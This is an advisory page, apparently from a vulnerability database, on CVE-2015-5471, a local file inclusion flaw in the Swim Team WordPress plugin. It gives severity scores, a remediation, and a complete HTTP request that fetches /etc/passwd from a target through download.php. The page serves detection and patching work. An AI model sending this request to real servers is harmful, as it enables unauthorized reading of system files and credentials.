🔙 목록으로 돌아가기

CVE-2015-5471: Swim Team <= v1.44.10777 - Local File Inclusion

TitleSwim Team <= v1.44.10777 - Local File Inclusion
Author0x_Akoko
SeverityMedium
ImpactAn attacker can exploit this vulnerability to read sensitive information from the server, such as database credentials, and potentially execute arbitrary code.
RemediationUpgrade to Swim Team version 1.45 or newer.
CVSS Score5.3
EPSS Score0.41406
CVE IDCVE-2015-5471
CWE IDCWE-22
Tags cve2015 cve wordpress wp-plugin lfi wpscan packetstorm swim_team_project vuln

🔍 Vulnerability Description

The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.

🌐 HTTP Request

GET /wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2015/CVE-2015-5471.yaml

🦈 Packet Capture: ⬇️ Download cve-2015-5471.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A